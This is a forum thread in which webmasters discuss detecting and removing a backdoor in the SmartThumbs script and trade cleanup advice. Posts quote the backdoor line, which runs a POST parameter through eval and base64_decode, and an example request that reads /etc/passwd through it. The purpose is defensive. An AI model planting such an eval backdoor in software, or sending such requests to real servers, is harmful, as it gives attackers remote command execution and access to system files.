|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
|
|
#1 |
|
Confirmed User
Join Date: Jun 2007
Posts: 160
|
removing ST exploit
I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...
Remove SmartThumbs exploit in 5 steps
__________________
dlXer - web design, developing, managed hosting, website optimizations |
|
|
|
|
|
#2 |
|
Confirmed User
Industry Role:
Join Date: Dec 2002
Location: in your head
Posts: 3,625
|
i read it and got a small question:
it says if you got the include line and the base64 line then youre still infected. i only got this one: @eval(base64_decode($_POST[qxp]));//'; does that mean im not infected, or still infected?
__________________
icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com |
|
|
|
|
|
#3 |
|
Confirmed User
Industry Role:
Join Date: Dec 2002
Location: in your head
Posts: 3,625
|
damn just found the other line as well, except it aint including sesa.tmp but webcam.tmp.
should i show the post you made to my sys admin and have them take care of it? or do it myself, as i dont have access to phpmyadmin. my host normally does that type of stuff. is there any other way besides phpmyadmin to do this?
__________________
icq:148573096 skype:dabone2 email:boneless(a)mgpteam(.)com |
|
|
|
|
|
#4 |
|
Confirmed User
Join Date: Jun 2007
Posts: 160
|
you're infected for sure
well... you need something which will allow you to edit entries in mysql tables... so phpmyadmin or anything else capable to edit table values
__________________
dlXer - web design, developing, managed hosting, website optimizations |
|
|
|
|
|
#5 |
|
Confirmed User
Industry Role:
Join Date: Aug 2006
Location: Poland
Posts: 9,231
|
untested (might not work at all. i dont have ST, and i just wrote it based on the instructions in the blog post). I take no responsibility if it breaks something, use at your own risk.
PHP Code:
__________________
Mechanical Bunny Media Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development |
|
|
|
|
|
#6 | |
|
Too lazy to set a custom title
Join Date: Jan 2002
Location: Holland
Posts: 9,870
|
Quote:
$niche is undefined
__________________
Don't let greediness blur your vision | You gotta let some shit slide icq - 441-456-888 |
|
|
|
|
|
|
#7 |
|
Confirmed User
Industry Role:
Join Date: Aug 2006
Location: Poland
Posts: 9,231
|
Sure it is, its including the variables.php file before inserting it
__________________
Mechanical Bunny Media Mechbunny Tube Script | Mechbunny Webcam Aggregator Script | Custom Web Development |
|
|
|
|
|
#8 |
|
Confirmed User
Join Date: Jun 2008
Posts: 1,548
|
nice stuff. Thanks for sharing.
|
|
|
|
|
|
#9 |
|
Confirmed User
Join Date: Jun 2007
Posts: 160
|
Code:
$dbserver = ''; $dbuser = ''; $dbpass = ''; $dbname = ''; however I'd suggest that you manually take a look at those files so you double check everything and avoid any major fuckup...
__________________
dlXer - web design, developing, managed hosting, website optimizations |
|
|
|
|
|
#10 | |
|
Too lazy to set a custom title
Join Date: Mar 2002
Location: Australia
Posts: 17,393
|
Quote:
So they could post something like qxp=cat%20/etc/passwd (display the contents of the password file) |
|
|
|
|
|
|
#11 |
|
Confirmed User
Industry Role:
Join Date: Apr 2006
Location: Germany
Posts: 4,323
|
Holy shit. Who in the right state of mind would add such a code to their product? Yikes!
![]()
__________________
--- ICQ 14-76-98 <-- I don't use this at all |
|
|
|
|
|
#12 |
|
Masterbaiter
Industry Role:
Join Date: Feb 2006
Posts: 28,510
|
__________________
“If you can convince the lowest white man he’s better than the best colored man, he won’t notice you’re picking his pocket. Hell, give him somebody to look down on, and he’ll empty his pockets for you.” |
|
|
|
|
|
#13 |
|
So Fucking Banned
Join Date: Aug 2008
Location: Just Blow Me
Posts: 10,551
|
wtf.......................
|
|
|
|
|
|
#14 |
|
Confirmed User
Industry Role:
Join Date: Mar 2004
Location: Rock Hill, SC
Posts: 5,370
|
|
|
|
|
|
|
#15 |
|
Confirmed User
Industry Role:
Join Date: Apr 2006
Location: Germany
Posts: 4,323
|
This thread is about a security exploit. I thought the info above was the security hole.
![]()
__________________
--- ICQ 14-76-98 <-- I don't use this at all |
|
|
|
|
|
#16 |
|
there's no $$$ in porn
Industry Role:
Join Date: Jul 2005
Location: icq: 195./568.-230 (btw: not getting offline msgs)
Posts: 33,063
|
if you box was compromised, there's only 1 thing to do: reinstall everything.
|
|
|
|
|
|
#18 |
|
there's no $$$ in porn
Industry Role:
Join Date: Jul 2005
Location: icq: 195./568.-230 (btw: not getting offline msgs)
Posts: 33,063
|
|
|
|
|
|
|
#19 |
|
Richest man in Babylon
Industry Role:
Join Date: Jan 2002
Location: Posts: 10,002
Posts: 5,816
|
Bumping this to the top. I think this exploit is not getting the attention it deserves.
We cleaned a number of sites and in some case the exploit was back in 3 hours. |
|
|
|
|
|
#20 |
|
Confirmed User
Join Date: Aug 2003
Location: Porn Town
Posts: 672
|
Bumping ..
|
|
|
|